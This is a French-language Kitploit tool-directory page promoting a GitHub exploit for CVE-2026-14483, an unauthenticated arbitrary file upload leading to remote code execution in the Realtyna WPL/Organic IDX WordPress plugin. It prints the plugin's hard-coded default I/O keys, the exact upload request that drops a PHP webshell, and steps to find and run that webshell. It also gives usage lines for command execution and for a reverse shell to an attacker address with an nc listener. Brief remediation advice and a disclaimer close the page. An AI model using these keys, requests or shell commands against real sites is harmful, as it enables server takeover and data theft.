Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-14483_exploit — Exploit de téléversement arbitraire de fichiers sans authentification pour le plugin WordPress Realtyna WPL/Organic IDX, enchaînant le téléversement d'un webshell PHP pour aboutir à une exécution de code à distance (RCE), avec des modes d'exécution de commandes et de reverse shell. | Kitploit
Outils/GitHubGitHub/0xdak/cve-2026-14483_exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionRed Teaming
GitHub0xdak/cve-2026-14483_exploit

CVE-2026-14483_exploit

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

il y a 17 joursPas encore vérifié

Exploit de téléversement arbitraire de fichiers sans authentification pour le plugin WordPress Realtyna WPL/Organic IDX, enchaînant le téléversement d'un webshell PHP pour aboutir à une exécution de code à distance (RCE), avec des modes d'exécution de commandes et de reverse shell.

Partager

CVE-2026-14483 — Realtyna WPL / Organic IDX — Téléversement arbitraire de fichiers non authentifié → RCE

Téléversement arbitraire de fichiers non authentifié menant à une RCE dans le plugin WordPress Realtyna WPL / Organic IDX (real-estate-listing-realtyna-wpl ≤ 5.2.0).

Le plugin enregistre un « service I/O » sur le hook public init de WordPress, accessible sans authentification à la racine du site via ?wplview=io&wplformat=io. La seule protection est une paire de clés par défaut statiques codées en dur fournies dans les migrations du plugin (identiques sur chaque installation), avec io_status activé par défaut :

root@kitploit:~
public_key  = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
private_key = Eft76bdh0o2uyhJkbG3T

La commande set_property (libraries/io/mobile_application/set_property.php → wpl_file::upload) enregistre le file[] téléversé avec move_uploaded_file et sans aucun contrôle d'extension/MIME, de sorte qu'un webshell .php peut être déposé et exécuté en tant qu'utilisateur web.

  • Affecté : real-estate-listing-realtyna-wpl ≤ 5.2.0
  • Corrigé : 5.3.0 (la commande vulnérable non authentifiée a été supprimée)
  • CWE : 434 (Unrestricted Upload of File with Dangerous Type)
  • Impact : RCE non authentifiée en tant qu'utilisateur web (www-data)

Exigences

Uniquement la bibliothèque standard de Python 3 — aucune dépendance.

Utilisation

root@kitploit:~
# run a command and print output
python3 exploit.py http://target/ -c id

# reverse shell (start a listener first: nc -lvnp 4444)
python3 exploit.py http://target/ --shell 10.10.14.5:4444

Fonctionnement

  1. Téléversement — POST /?wplview=io&wplformat=io&public_key=…&private_key=…&cmd=set_property&commands_directory=mobile_application&user_id=1 avec un file[] multipart nommé image_<name>.php. Le préfixe image_ est supprimé, donc le fichier est enregistré sous le nom <name>.php.
  2. Localisation — le webshell atterrit dans wp-content/uploads/WPL/<pid>/<name>.php, où <pid> est l'identifiant de la propriété créée par la requête (la réponse ne le renvoie pas). L'outil énumère les petits identifiants de propriété pour trouver le shell.
  3. Exécution — accéder à …/<name>.php?c=<cmd>.

Identifier une cible

Un site WordPress avec le plugin real-estate-listing-realtyna-wpl ≤ 5.2.0 actif. Le point de terminaison répond à GET /?wplview=io&wplformat=io (le service I/O du plugin).

Correction

Mettre à jour le plugin vers ≥ 5.3.0, valider les extensions/MIME des téléversements, ne jamais exécuter de PHP depuis wp-content/uploads et renouveler les clés I/O statiques par défaut du plugin.

Avertissement

Pour des tests de sécurité autorisés et à des fins éducatives uniquement. Utilisez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.

Télécharger l’outil